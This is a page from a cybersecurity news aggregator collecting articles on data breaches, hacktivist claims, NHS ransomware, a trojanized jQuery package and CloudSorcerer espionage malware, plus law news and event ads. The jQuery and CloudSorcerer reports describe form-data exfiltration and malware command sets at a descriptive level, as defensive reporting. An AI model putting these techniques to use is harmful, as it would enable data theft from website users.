Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for Shopify Denies Data ...

 Cybersecurity News

E-commerce supplier Shopify has confirmed that it did not experience a cyber security incident but stated that a data loss was caused by a third-party app. The Shopify data breach was reportedly carried out by a known threat actor, operating under the alias ‘888’, on the dark web marketplace BreachForums. Shopify   show more ...

Inc. is a Canada-based multinational business that offers a proprietary e-commerce platform along with integrations to allow individuals, retailers and other businesses to setup their own online stores or retail point-of-sale websites. Denying that a data breach took place from its own accounts, Shopify released a statement to multiple media outlets which read, “Shopify systems have not experienced a security incident. The data loss reported was caused by a third-party app. The app developer intends to notify affected customers.” The company, however, did not give details of the cybersecurity incident that it was referring to, name of the third-party app or state the number of impacted individuals. Recent Claim of Shopify Data Breach While Shopify did not elaborate on the cybersecurity incident, the statement could be referring to the recent data breach which allegedly took place on July 4, 2024. Threat actor ‘888’ has allegedly shared stolen data from Shopify on BreachForums which consisted personal details, email subscriptions and order-related information of its users. [caption id="attachment_80706" align="aligncenter" width="1723"] Source: BreachForums[/caption] The threat actor claimed to have carried out a data breach containing 179,873 rows of user information. These records apparently include Shopify ID, First Name, Last Name, Email, Mobile, Orders Count, Total spent, Email subscriptions, Email subscription dates, SMS subscription, and SMS subscription dates. The hacker,888, had previously been linked to multiple high-profile data breaches including Credit Suisse, Accenture India,  Shell,  Heineken, and UNICEF. The breach could possibly have stemmed from a recent data breach incident impacting Evolve Bank and Trust. Evolve Bank and Trust is a supporting partner of Shopify Balance, a money management integration built-in to the admin pages of Shopify stores. The bank is also a third-party issuer of Affirm debit cards. Evolve Bank and Trust Data Breach Linked to Shopify? Towards the end of June, the Evolve Bank confirmed that it had been impacted by a cybersecurity incident claimed by LockBit. The bank disclosed that the stolen data included sensitive personal information such as names, social security numbers(SSNs), dates of birth, and account details, among other data. [caption id="attachment_80709" align="aligncenter" width="559"] Source: X.com(@lvdeeaz)[/caption] In an official statement to the alleged Evolve data breach, the bank said, “Evolve is currently investigating a cybersecurity incident involving a known cybercriminal organization that appears to have illegally obtained and released on the  dark web the data and personal information of some Evolve retail bank customers and financial technology partners’ customers (end users).” Later, the financial firm Affirm Holdings had confirmed  that it had also been affected by the Evolve Bank and Trust Data Breach. The firm stated in a security notice on its website, “Affirm is aware of a cybersecurity incident involving Evolve, a third party vendor that serves as an issuing partner on the Affirm Card. We are actively investigating the issue. We will communicate directly with any impacted consumers as we learn more.” Given the severity of the data breach, Shopify customers must be vigilant and guard against phishing attempts and identity thefts. They should adopt healthy cyber practices including monitoring their account for unusual activities, changing passwords, enabling two-factor authentication and being wary of phishing emails and messages requesting sharing of personal information. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for Unconfirmed: NoName ...

 Cybersecurity News

The infamous ransomware group NoName has allegedly launched cyberattacks on MitID, the Finland Chamber of Commerce, and OP Financial Group. The NoName ransomware took to a dark web forum to announce their actions, framing them as retaliation against Denmark and Finland's recent military and infrastructural   show more ...

initiatives supportive of NATO. In a post filled with both defiance and threat, NoName stated: "Denmark has trained the first 50 Ukrainian specialists in servicing F-16 fighter jets, Commander of the Danish Air Force Jan Dam said in an interview with TV2. Most of the specialists have already returned to Ukraine to prepare for the reception of F-16s at local air bases. The training of the first group of Ukrainian pilots continues in Denmark." The message did not stop at Denmark. It continued with a pointed statement about Finland's recent activities: "Finland has begun repairing roads and bridges in Lapland to prepare for the deployment of NATO troops on its territory. ERR.EE reports on its change of stance on NATO forces and planned infrastructure work." NoName concluded with a chilling warning: "As you can see, the Russophobic authorities of these countries have not learned the lessons of the past. Therefore, we decided to clearly show what such initiatives lead to." [caption id="attachment_80729" align="aligncenter" width="441"] Source: X[/caption] [caption id="attachment_80730" align="aligncenter" width="447"] Source: X[/caption] Background of the Allegedly Targeted Companies MitID: MitID is Denmark's new digital identification system, replacing the NemID. It is an essential component of Denmark's digital infrastructure, allowing citizens and businesses to access various public and private services securely. An attack on this system could potentially disrupt countless services and erode trust in the nation's digital security. Finland Chamber of Commerce: The Finland Chamber of Commerce plays a critical role in supporting Finnish businesses, fostering economic growth, and promoting international trade. A cyberattack on Finland Chamber of Commerce could aim to destabilize economic activities and undermine business confidence. OP Financial Group: As Finland's largest financial services group, OP Financial Group's services range from banking to insurance. A cyber attack here could have severe ramifications, potentially affecting millions of customers, disrupting financial transactions, and causing significant economic damage. Upon accessing the official websites of the targeted companies, they appeared fully functional, showing no signs of foul play. To verify further, The Cyber Express Team reached out to the targeted companies. However, as of the time of writing this report, no official response has been received, leaving the claim unverified. The Reason Behind NoName Attack The timing and targets of these cyberattacks are no coincidence. They align closely with recent developments in Denmark and Finland's military and infrastructural commitments to NATO, particularly regarding support for Ukraine amidst its ongoing conflict with Russia. Denmark's training of Ukrainian specialists in F-16 fighter jet maintenance marks a significant step in bolstering Ukraine's military capabilities. This initiative underscores Denmark's commitment to supporting Ukraine, which has been under sustained aggression from Russia since the 2014 annexation of Crimea and the more recent 2022 invasion. Finland's decision to repair roads and bridges in Lapland for NATO troop deployment signals a notable shift in its defense strategy. Since joining NATO, Finland has taken several steps to align its infrastructure and military readiness with NATO standards, a move likely aimed at deterring Russian aggression in the region. To Sum Up NoName's actions exemplify the increasing use of cyber warfare as a tool for political and military coercion. These attacks are designed to cause immediate disruption and send a message of deterrence and retaliation. Targeting critical national infrastructure and prominent institutions highlights the vulnerabilities modern societies face in the digital age. The cyber attacks claimed by NoName against Danish and Finnish institutions remain unverified. The Cyber Express Team is closely monitoring the situation and will update its readers as more information or responses from the allegedly targeted companies become available. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

image for NHS ‘Highly Vulner ...

 Cybersecurity News

A leading cybersecurity expert has issued a warning that the National Health Service (NHS) remains highly vulnerable to cyberattacks unless significant updates are made to its computer systems. This comes in the wake of a major ransomware attack that has severely disrupted healthcare services across London. Professor   show more ...

Ciaran Martin, the founding CEO of the UK's National Cyber Security Centre (NCSC), shared his concerns in an interview with the BBC. "I was horrified, but not completely surprised. Ransomware attacks on healthcare are a major global problem," Prof. Martin stated. Despite NHS England’s investment of £338 million over the past seven years to enhance cybersecurity resilience, Prof. Martin’s warnings suggest that more urgent and extensive actions are necessary to protect the NHS from future threats. On June 3, 2024, a cyberattack targeted Synnovis, a pathology testing organization, severely affecting services at Guy's, St Thomas', King's College, and Evelina London Children's Hospitals. NHS England declared it a regional incident, resulting in the postponement of 4,913 acute outpatient appointments and 1,391 operations. The cyberattack raised significant data security concerns and has been described as one of the most severe cyber incidents in British history. The Attackers and Their Demands The Russian-based hacking group Qilin believed to be part of a Kremlin-protected cyber army, claimed responsibility for the attack. They demanded a £40 million ransom, which the NHS refused to pay. Consequently, the group published stolen data on the dark web, reflecting a growing trend of Russian cyber criminals targeting global healthcare systems. Prof. Martin, now a professor at the University of Oxford, highlighted three critical issues facing NHS cybersecurity: outdated IT systems, the need to identify vulnerable points, and the importance of basic security practices. "In parts of the NHS estate, it's quite clear that some of the IT is out of date," he noted. He emphasized the necessity of identifying "single points of failure" in the system and implementing better backups. Improving basic security measures could significantly hinder attackers. "Those little things make the point of entry quite a lot harder for the thugs to get in," Prof. Martin added. Front-line Staff Concerns Concerns among front-line staff are mounting in the wake of the recent cyber-attacks. Many have pointed to outdated equipment and a lack of unified systems as major vulnerabilities. A senior intensive care doctor in London remarked, "The NHS is vulnerable. It's a patient safety issue, but there's no interest in addressing it." An A&E consultant in north London highlighted the use of "decade-old computers and Windows 7," noting that systems crash "every few months." A junior doctor expressed concerns over the risks posed by outdated equipment and the impact of privatization. "Old computers pose a security risk for patient data. The Synnovis incident shows how vulnerable we are," the doctor said. A senior orthopedic surgeon described the fragmented nature of NHS IT systems, where a patient’s X-ray in one hospital cannot be accessed in another. "It's shocking and worrying for cybersecurity," he said. Dr. Daniel Gardham from the Surrey Centre for Cyber Security echoed Prof. Martin’s concerns, emphasizing the link between outdated systems and cyber-attacks. "If you have old computers, then simply put, there's going to be unpatched vulnerabilities," Dr. Gardham explained. He stressed that while sophisticated attacks do occur, many breaches result from basic security oversights. "It could be something really, really, simple and actually most likely it is something very, very, simple. It would be one person, perhaps, that had a weak password or left their computer unattended in a cafe." NHS England’s Response An NHS England spokesperson told the BBC, "We are increasing cyber resilience across the NHS and over £338 million has been invested over the past seven years to help keep health and care organizations as safe as possible. Our ambitious Cyber Improvement Programme will support the NHS to respond to the changing cyber threats, expand protection, and reduce the risk of a successful attack." As cyber threats continue to evolve, the NHS must prioritize these updates to safeguard patient data and ensure the continuity of critical healthcare services. The collective insights from cybersecurity experts and front-line staff highlight the pressing need for immediate and sustained action to protect the NHS from future cyber threats.

image for Revolutionizing Fina ...

 Features

By Neelesh Kripalani, Chief Technology Officer, Clover Infotech In today’s dynamic financial landscape, institutions are leveraging next-gen enterprise AI platforms to revolutionize operations, drive innovation, and deliver superior customer experiences. These cutting-edge solutions are not just tools, they are   show more ...

catalysts for transformation, empowering financial institutions to navigate complexities, mitigate risks, and seize opportunities in an increasingly digital world. At the heart of this revolution are advanced new-age technologies that are integrated into robust enterprise platforms tailored for the unique needs of the financial sector. These platforms enable institutions to harness the power of data by optimizing processes, unlocking insights, and enhancing decision-making across various functions from risk management and fraud detection to customer service and personalized offerings. By Leveraging Next-gen AI Platforms, Financial Institutions Can  Enhance Operational Efficiency - AI-driven automation streamlines manual processes reduces errors, and accelerates workflows, enabling institutions to operate more efficiently and cost-effectively. Augment Decision-Making - AI-powered analytics provide real-time insights into market trends, customer behavior, and risk factors, empowering decision-makers with relevant information to make informed decisions swiftly. Mitigate Risks - Advanced AI algorithms enhance risk analysis, enabling institutions to proactively identify and mitigate potential risks, fraud, and compliance issues, safeguarding assets and reputation. Personalized Customer Experiences - AI-driven personalization enables institutions to deliver tailored products, services, and recommendations based on individual preferences, and behavior, enhancing customer engagement and loyalty. Drive Innovation - AI platforms foster a culture of innovation by enabling rapid prototyping, experimentation, and iterative development of new products, services, and business models, fostering competitiveness and market leadership. The Future: Challenges and Opportunity The next-gen AI platforms enable financial institutions to undertake informed decision-making, enhance operational efficiency, personalize customer experiences, and improve regulatory compliance. However, these opportunities come with challenges such as privacy and security concerns, ethical and bias issues, integration with legacy systems, skill and knowledge gaps, and regulatory uncertainties. To navigate these, institutions should invest in cybersecurity, promote ethical AI practices, upgrade infrastructure, and focus on talent development. In conclusion, next-gen enterprise AI platforms are not just technology solutions; they are strategic enablers that empower financial institutions to thrive in an increasingly competitive and digital environment. By embracing these platforms, institutions can unlock new opportunities, drive growth, and deliver unparalleled value to customers.

image for Did Russia Cyber Arm ...

 Cybersecurity News

The Russian Cyber Army Team has claimed responsibility for targeting the website of Telecom Liechtenstein. This alleged Liechtenstein cyberattack was announced in a post where the group declared: "Good morning Cyber Army! Let's send a small and modest greeting to Liechtenstein from our team. Let's start   show more ...

with the provider." Upon accessing the official website of Telecom Liechtenstein, The Cyber Express Team encountered a 504 error, indicating that the site was down. This error typically suggests that the server did not receive a timely response from another server it was attempting to communicate with, causing the site to become unavailable. In an effort to verify the claim, The Cyber Express Team attempted to reach out to the targeted firm. However, they faced difficulties in finding a direct contact to communicate with Telecom Liechtenstein. Despite these challenges, the team is persistently trying to establish contact to gain clarity on the situation. [caption id="attachment_80780" align="aligncenter" width="371"] Source: X[/caption] Liechtenstein Cyberattack: Potential Technical Issues While the website's downtime could be due to a technical issue, the absence of any official communication from Telecom Liechtenstein makes it challenging to confirm the exact cause. Without a statement from the company, it remains speculative whether the downtime is the result of a cyberattack on Liechtenstein or an unrelated technical glitch. Should the Russian Cyber Army’s claim be substantiated, the implications could be significant. A successful cyberattack on a major telecom provider like Telecom Liechtenstein could disrupt essential services, compromise sensitive data, and highlight vulnerabilities within the country's digital infrastructure. Such an incident would not only affect Telecom Liechtenstein but could also have broader repercussions for other businesses and services reliant on their network. This alleged Liechtenstein cyberattack fits into a larger pattern of cyber-attacks attributed to Russian cyber groups. These groups have been increasingly active, targeting various entities across the globe. The motivations behind these cyberattacks often range from political to economic, and they serve to showcase the attackers' capabilities while instilling fear and uncertainty. To Wrap up As of now, the claim by the Russian Cyber Army remains unverified. The Cyber Express Team continues to monitor the situation closely and is actively trying to get in touch with Telecom Liechtenstein for an official response. This story is developing, and The Cyber Express Team is committed to providing updates to its readers as more information becomes available.

image for jQuery Attack Hits N ...

 Cybersecurity News

A trojanized version of jQuery has been spreading on the npm JavaScript package manager, GitHub and elsewhere, for use in a jQuery attack, security researchers have discovered. Phylum researchers said they have been monitoring the “persistent supply chain attacker” since May 26, initially on npm, “where we saw   show more ...

the compromised version published in dozens of packages over a month. After investigating, we found instances of the trojanized jQuery on other platforms, such as GitHub, and even as a CDN-hosted resource on jsDelivr.” The malicious packages can extract website form data and send it to one of many URLs. In all, the researchers observed 68 malicious packages across 33 domains, which they listed in a blog post. Because they contain so much widely used open source code, platforms like npm and GitHub are an attractive place for threat actors to try to distribute malicious code, or to hijack legitimate projects to launch supply chain attacks. jQuery Attack Shows ‘High Variability’ The researchers said the jQuery attack “is unlike most we've seen at this scale, which typically have a clear, well-defined pattern and an obvious automated aspect. Here, the ad-hoc nature and custom variability of the packages, along with the long timeframe over which they were published, suggest that each package was manually assembled and published.” The published packages were "relatively minimal," they said, and the attacker included at least one complete copy of jQuery, often named jquery.min.js, along with other variations such as registration.min.js, icon.min.js, and fontawesome.js. The exfiltration URLs were typically unique for each package. The attacker published to npm under new usernames. although a single user would occasionally publish multiple related packages. The attacker occasionally included multiple file versions with different names within the same project. “Interestingly, almost every package also contained personal files not typically included in npm publications, such as the npm cache folder, npm logs folder, and a termux.properties file,” the Phylum researchers said. How the jQuery Attack Works Each malicious package contained a copy of jQuery with one small difference, the researchers said: the end function, a part of the jQuery prototype, was modified to include additional malicious code. The attacker “has cleverly hidden the malware in the seldom-used end function of jQuery, which is internally called by the more popular fadeTo function from its animation utilities,” they wrote. The end method is used to end the most recent filtering operation in the current chain and return the set of matched elements to its previous state. The example of unaltered end method code they provided is pretty simple: [caption id="attachment_80836" align="alignnone" width="500"] Normal jQuery end function (source: Phylum)[/caption] In a malicious example the researchers shared, the code is significantly more complex: [caption id="attachment_80838" align="alignnone" width="500"] jQuery attack altered end function (source: Phylum)[/caption] They noted that the attacker is firing off a non-blocking GET request via $.ajax to a remote URL, which includes a query parameter that is constructed by serializing all form data on the page (($("form").serialize())) and then encoding it into a hex string. “This means that if you’re using this trojanized version, all form data on the page is exfiltrated any time the end function is called,” they wrote. Developers Should Be Cautious with Packages For the malware to be triggered, the researchers noted that a user must install one of the malicious packages, use the included trojanized jQuery file, and then invoke either the end function or the fadeTo function. “This specific chain of conditions makes it unclear whether this is a highly targeted attack or if the attacker is simply blending in well and randomly affecting users who download and use these packages,” they said. “The sheer number of packages, the variability in naming conventions, and the inclusion of personal files within these packages raise questions about the attacker’s capabilities and intentions,” they said. “These factors contrast sharply with the more sophisticated nature of the actual malware itself and the effort taken to conceal its maliciousness in plain sight. “Despite the narrow set of conditions required to trip the malware, the broad distribution of the packages means the potential impact is wide, potentially affecting many unsuspecting developers. This novel attack exemplifies the rising complexity and potential for the broad reach of supply chain threat actors.” For developers, supply chain threats like these mean they must be careful to download packages only from trusted sources and to update and patch regularly. Verifying package signatures and using package security tools can also help ensure the security of their projects.

image for Botswana Cyber Revol ...

 Business News

Gaborone, Botswana: TraiCon Events will host Botswana’s premier cybersecurity event titled “Cyber Revolution Summit” scheduled on 9th August 2024 in Gaborone, Botswana. This summit will feature keynote presentations and panel discussions with top security experts from various industries covering a range of   show more ...

topics, including cybersecurity innovations, data privacy & security, risk management, network security, threat detection & intelligence, and vulnerability management. Cyber Revolution Summit: A Networking Opportunity This summit is an indisputable platform for public & private alliances, where this summit aims to bring 500+ pre-qualified CISOs, CIOs, heads of cyber security, digital transformation, IT infrastructure, information and communication technologies, and other experts in this domain to discuss the potential and recent trends of cybersecurity. Many system integrators, IT security solution providers, cybersecurity companies, cloud & data security, threat management, cyber software, and cybercrime companies will be participating in the Cyber Revolution Summit as Sponsors or Exhibitors who will be showcasing their host of solutions for the future of cyberspace. Join us in Botswana as it leads the way to the future at the Cyber Revolution Summit. For more information regarding the event, please visit: https://cyber.traiconevents.com/bw/ For event inquiries: Eng. Prasanna | Event Producer | Traicon Events prasanna@traiconevents.com | +0091 7708523918

image for CloudSorcerer APT Ta ...

 Firewall Daily

Security researchers discovered a new sophisticated cyberespionage tool targeting Russian government entities in May 2024. The tool, dubbed CloudSorcerer, exploits popular cloud infrastructure services such as Microsoft Graph, Yandex Cloud and Dropbox for use as command and control (C2) servers for stealth monitoring,   show more ...

data collection and exfiltration operations. Technical Details of CloudSorcerer Campaign Researchers from Kaspersky believe that a new APT group is behind the CloudSorcerer malware. The malware is a single Portable Executable (PE) binary written in the C language and adjusts Its functionality depending on the process from which it is executed. Upon execution, the malware calls the GetModuleFileNameA function to determine the name of the process from which it has been run and then compares these process names to a set of hardcoded strings indicating browser, mspaint.exe, and msiexec.exe identifiers. The malware activates different functions depending upon the identified process name: In mspaint.exe: Acts as a backdoor within the program to collect data and execute code. In msiexec.exe: Initiates C2 communication. In browser or other detected processes: Injects shellcode into targeted processes before terminating. The malware's backdoor module begins by collecting system information about the victim machine, while running in a separate thread. This information includes computer name, user name, Windows subversion information, and system uptime. All the collected data is stored in a specially created structure. Once the information gathering is complete, the data is written to the named pipe .PIPE[1428] connected to the C2 module process. It then executes various commands based on received instructions, such as gathering drive information, collecting file and folder data, executing shell commands, manipulating files, injecting shellcode into processes, running advanced tasks like creating processes, modifying registry keys and managing network users. These commands are specified under a unique COMMAND_ID for each operation within the malware program: [caption id="attachment_80799" align="alignnone" width="863"] Source: securelist.com (Kaspersky)[/caption] 0x1 – Collect information about hard drives in the system, including logical drive names, capacity, and free space. 0x2 – Collect information about files and folders, such as name, size, and type. 0x3 – Execute shell commands using the ShellExecuteExW API. 0x4 – Copy, move, rename, or delete files. 0x5 – Read data from any file. 0x6 – Create and write data to any file. 0x8 – Receive a shellcode from the pipe and inject it into any process by allocating memory and creating a new thread in a remote process. 0x9 – Receive a PE file, create a section and map it into the remote process. 0x7 – Run additional advanced functionality. The researchers also observed the use of Github pages as C2 servers, stealthily hidden as hex code within the author section of the profile. These profiles contained forks of public legitimate code repositories without any modification or changes to appear legitimate. The same hex string was also observed hidden within the names of public photo albums hosted on the Russian album-sharing service, https://my.mail[.]ru. Associated profiles on both services contained a photo of a male from a public photo bank. [caption id="attachment_80806" align="aligncenter" width="253"] Source: securelist.com (Kaspersky)[/caption] The malware picks up hex strings from these sources, breaking them into segments that represent different instructions. The first segment of the decoded hex string indicates the cloud service intended for malware usage. Example, a byte value of “1” represents Microsoft Graph cloud, byte “0” represents Yandex cloud. The segments that follow form a string used to authenticate various different cloud APIs, as well as a subset of functions for specific interactions with the selected cloud services. Similarity to CloudWizard APT Campaign While there researchers noted similarities in the campaign's modus operandi and tactics to the previously known CloudWizard APT group, they state that the significant differences in code and functionality in the malware used by both groups suggest that CloudSorcerer is likely from the work of a newer APT developing its own unique tools. The CloudSorcerer campaign represents the use of sophisticated operations against Russian government entities. Its use of popular cloud services such as Microsoft Graph, Yandex Cloud, and Dropbox for C2 infrastructure, along with GitHub and MyMail photo albums for initial C2 communications, demonstrates a well-organized approach to espionage. The malware’s ability to dynamically adapt its behavior depending upon the infected process along with its complex use of Windows pipes, further highlights its intricacy. The researchers have shared a list of indicators of compromise (IOCs) to help protect against deployment of the CloudSorcerer malware.

image for Staying Competitive ...

 Features

By Ian Thornton-Trump, CISO, Cyjax “There are three ways to make a living in this business: be first, be smarter, or cheat.” So says Jeremy Irons’ CEO at the climactic meeting in financial crisis drama Margin Call. “Now, I don’t cheat.” While we should be wary of taking moral lessons from someone who, in   show more ...

this fictionalized recounting, kickstarts the 2008 financial crash, there are those who do cheat to be better at business. Not a person, or a corporation, but the People’s Republic of China. China’s domestic market is kept strong and competitive by a strategy with hacking and cybercrime as key elements. Why does it do this, and how? Slowing Growth China is rightly regarded as an economic powerhouse, but there are indications that growth is slowing down. In 2020, a plan was put in place to double the size of the economy in fifteen years. But the IMF estimates that China’s GDP growth will be below 4% in the coming years, well below ambitions. Other estimates put growth as low as 3%, and likely to fall to 2% by 2030. We can see the problem by looking specifically at the property sector, which contributes around a quarter of China’s GDP. The early 2000s saw a boom following the privatization of property, but at least 60 developers have collapsed since 2020. The most valuable real estate company in the world was ordered to liquidate in early 2024, and there are fears that others are overleveraged and may meet the same fate. Manufacturing has also fallen. Factory activity has fallen. In 2023, the Purchasing Managers Index, a useful indicator of manufacturing activity, fell for five consecutive months, then fell again after a short rise. Consumer prices are also close to deflation. It’s difficult to evaluate these figures, as there is no independent verification of Chinese government statistics, but the outlook is not as hoped. But with the People’s Bank of China suggesting that it will step up policy adjustments to promote a rebound in prices, it’s safe to assume that not all is going to plan. There are other challenges: unemployment figures are high, at least until June 2023, when publication ceased. Jobs for university graduates are scarce, and salaries are down. There is also a demographic problem in the offing, with low birth rates despite the abolishment of the One Child Policy in 2015. China is faced with a problem many countries are facing—an aging population supported by a declining workforce. In short: the Chinese economy is struggling. But that isn’t holding back its sophistication when it comes to cyber espionage. The Secret Ingredient is Cybercrime China has used cyber capabilities to further its interests since at least 2006. In the popular imagination, this is used to “disrupt the west”, and there is some truth in this. For example, it was reported last year that hackers had infiltrated water utilities, oil pipelines, and ports. These attacks were, according to some, state-backed Chinese hackers targeting US critical infrastructure in order to lay the technical groundwork for the disruption of communications between the US and Asia during future crises. But there is more to these hacking attempts than disruption. It’s often about information, specifically business information that can help support the Chinese economy. There have been several high profile examples of this type of attack linked to China. Operation Soft Cell targets internet-facing Microsoft Exchange servers, particularly in the telecoms, financial, and government sectors in an attempt to steal information. Sandman delivers malware in an attempt to subvert systems. VoltTyphoon in particular targets organisations with the intent of gathering information. China’s approach to cybercrime is not just to disrupt, but to steal information that can further its economic interests. It is pursuing a strategy of extracting technologies from Western companies, which it can then put to use. This is backed up by creating a protected domestic market—by using subsidies and nontariff barriers to build national leaders, China has an advantage as it competes globally. The control of businesses in China is highly regulated, making it difficult for foreigners to control businesses or for foreign-owned businesses to operate within the country. This protectionism could easily mean that Chinese businesses would find it difficult to be competitive in an international market, but the use of cybercrime to steal information helps to redress the balance. Expect More of The Same According to the security think tank CSIS, China has carried out a twenty-year campaign of cyber and non-cyber espionage, the result described by General Keith Alexander as a theft of industrial information and intellectual property through cyber espionage which constitutes the “greatest transfer of wealth in history.” The head of the Australian Security Intelligence Organisation has described China’s approach to cyber espionage as “well beyond traditional espionage and…the most sustained, scaled and sophisticated theft of intellectual property and acquisition of expertise that is unprecedented in human history”. China’s current economic woes are only likely to make the problem worse. As growth targets are missed and deflation becomes a real possibility, it’s very likely that we will see official policies that will aim to address the problem—along with an increase in sanctioned but unofficial cyber espionage. This year, we’re likely to see disruptive activity from China-affiliated threat groups, especially with so many elections taking place across the globe. Nation states will continue to test their cyber capabilities for disruption just as they test other defensive capabilities. But China’s cybercrime program will continue to have another aim, embracing espionage to support a growth economy, while also developing market-based economies in Africa and South America. Disclaimer: The views and opinions expressed in this guest post are solely those of the author(s) and do not necessarily reflect the official policy or position of The Cyber Express. Any content provided by the author is of their opinion and is not intended to malign any religion, ethnic group, club, organization, company, individual, or anyone or anything. 

image for New ‘Act 33’ Pen ...

 Firewall Daily

A recently passed Pennsylvania law aims to bolster consumer protections in the aftermath of data breaches. Act 33 of 2024, which is set to take effect in late September of this year, mandates stricter time limits for organizations to issue data breach notices and free provision of credit monitoring to affected   show more ...

individuals in the event of a data breach. Key Provisions of Act 33 Pennsylvania Law Under the provisions of the new law, organizations must notify the Pennsylvania Attorney General's Office if a data breach is found to affect more than 500 residents within the state of Pennsylvania. [caption id="attachment_80831" align="alignnone" width="2800"] Source: www.legis.state.pa.us[/caption] The notice is required to include the following details: 1) The organization name and location. (2) The date of the breach of the security of the system. (3) A summary of the breach incident of the security of the system. (4) An estimated total number of individuals affected by the breach of the security of the system. (5) An estimated total number of individuals in this Commonwealth affected by the breach of the security of the system. Along with the reporting requirements, one of the key provisions of the law is the requirement for organizations to provide free credit reports and one year of credit monitoring to all affected consumers. The law introduces a new era of protection for consumers, requiring organizations to assume all costs and fees associated with providing affected individuals with access to credit reports and credit monitoring services. This provision means that individuals from Pennsylvania will not have to pay for these services, which can provide peace of mind in the event of a data breach and add an additional layer of protection to help prevent identity theft and financial fraud. The law defines personal information as an individual's first name or first initial and last name in combination with certain sensitive data elements, such as Social Security numbers, driver's licenses, or financial account numbers. The law is an extension of the amendment act of December 22, 2005 (P.L.474, No.94), which states: "An act providing for security of computerized data and for the notification of residents whose personal information data was or may have been disclosed due to a breach of the security of the system; and imposing penalties," further providing for definitions, for notification of the breach of the security of the system and for notification of consumer reporting agencies; and providing for credit reporting and monitoring. The Act 33 law received unanimous support in both chambers of the state legislature, reflecting the broad recognition of the need for stronger data protection measures. Act Comes Amidst Geisinger Medical Center Data Breach Fall Out Reports of data breach incidents across the United States have surged in recent years, with a record of 3,122 incidents reported in 2023 nationwide – a 72% increase from the previous high in 2021. According to data from the Identity Theft Resource Center, these breaches affected hundreds of millions of Americans and resulted in billions of dollars in losses. The new law comes in the wake of high-profile breaches like the one at Pennsylvania's Geisinger Medical Center, which potentially exposed personal information of approximately one million patients. A former employee in connection to the data breach has been arrested. Jonathan Friesen, Geisinger chief privacy officer, stated in response to the arrest, “Our patients’ and members’ privacy is a top priority, and we take protecting it very seriously.” He added, “We continue to work closely with the authorities on this investigation, and while I am grateful that the perpetrator was caught and is now facing federal charges, I am sorry that this happened.” Disgruntled former patients of the hospital have joined in a class action lawsuit filed against Geisinger, demanding compensation. One former patient, James Wierbowski, filed a lawsuit on June 28, seeking monetary relief that could amount to more than $5 million.

image for Philippines Cyber Re ...

 Firewall Daily

Manila, Philippines- 19/06/24: TraiCon Events will be hosting the Philippines’ premier cybersecurity event titled “Cyber Revolution Summit” scheduled on 10th September 2024 in the Philippines. This summit will feature keynote presentations and panel discussions with top security experts from various industries   show more ...

covering a range of topics, including cybersecurity innovations, data privacy & security, risk management, network security, threat detection & intelligence, and vulnerability management. Cyber Revolution Summit- A Networking Opportunity This summit is an indisputable platform for public & private alliances, where this summit aims to bring 350+ pre-qualified CISOs, CIOs, heads of cyber security, digital transformation, IT infrastructure, information and communication technologies, and other experts in this domain to discuss the potential and recent trends of cybersecurity. Many system integrators, IT security solution providers, cybersecurity companies, cloud & data security, threat management, cyber software, and cybercrime companies will be participating in the Cyber Revolution Summit as Sponsors or Exhibitors who will be showcasing their host of solutions for the future of cyberspace. Join us in the Philippines as it leads the way to the future at the Cyber Revolution Summit. For more information regarding the event, please visit: https://cyber.traiconevents.com/ph/ For event inquiries: Eng. Prasanna | Event Producer | Traicon Events prasanna@traiconevents.com | +0091 7708523918

image for Identity Orchestrati ...

 Feed

Identity orchestration products are increasingly projected to be introduced to the market in the next couple of years. Market trends and benefits of identity orchestration are explored.

 Malware and Vulnerabilities

The malware has evolved into multiple versions, with GootLoader 3 being the latest one in use. Despite updates to the payload, the infection strategies have remained consistent since its resurgence in 2020.

 Malware and Vulnerabilities

A new variation of WordFence evasion malware has been discovered, concealing backdoors in infected WordPress environments. A suspicious plugin named "wp-engine-fast-action" was found tampering with the popular WordFence security plugin.

 Malware and Vulnerabilities

Exploiting these flaws could allow attackers to execute arbitrary commands, read source code, and gain unauthorized access. The vulnerabilities require authentication, with one flaw specifically requiring the built-in SSH server to be enabled.

 Incident Response, Learnings

Vinted, a prominent online platform for second-hand sales, has been fined €2,385,276 ($2,582,730) for violating the EU’s General Data Protection Regulation (GDPR) by not properly handling personal data deletion requests.

 Feed

Gentoo Linux Security Advisory 202407-22 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could arbitrary code execution. Versions greater than or equal to 115.9.1:esr are affected.

 Feed

Debian Linux Security Advisory 5726-1 - Two vulnerabilities were discovered in the GSS message token handling in krb5, the MIT implementation of Kerberos. An attacker can take advantage of these flaws to bypass integrity protections or cause a denial of service.

 Feed

Ubuntu Security Notice 6884-1 - Martin Kaesberger discovered that Nova incorrectly handled QCOW2 image processing. An authenticated user could use this issue to access arbitrary files on the server, possibly exposing sensitive information.

 Feed

Ubuntu Security Notice 6883-1 - Martin Kaesberger discovered that Glance incorrectly handled QCOW2 image processing. An authenticated user could use this issue to access arbitrary files on the server, possibly exposing sensitive information.

 Feed

Ubuntu Security Notice 6882-1 - Martin Kaesberger discovered that Cinder incorrectly handled QCOW2 image processing. An authenticated user could use this issue to access arbitrary files on the server, possibly exposing sensitive information.

 Feed

Gentoo Linux Security Advisory 202407-21 - Multiple vulnerabilities have been discovered in the X.Org X11 library, the worst of which could lead to a denial of service. Versions greater than or equal to 1.8.7 are affected.

 Feed

This whitepaper discusses eBPF technology in the Linux kernel and introduces the BPF Runtime Fuzzer (BRF), a fuzzer that can satisfy the semantics and dependencies required by the verifier and the eBPF subsystem.

 Feed

Gentoo Linux Security Advisory 202407-19 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.11.0 are affected.

 Feed

Red Hat Security Advisory 2024-4353-03 - An update for the nodejs:16 package is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

 Feed

Red Hat Security Advisory 2024-4352-03 - An update for kernel-rt is now available for Red Hat Enterprise Linux 8. Issues addressed include double free, memory leak, null pointer, spoofing, and use-after-free vulnerabilities.

 Feed

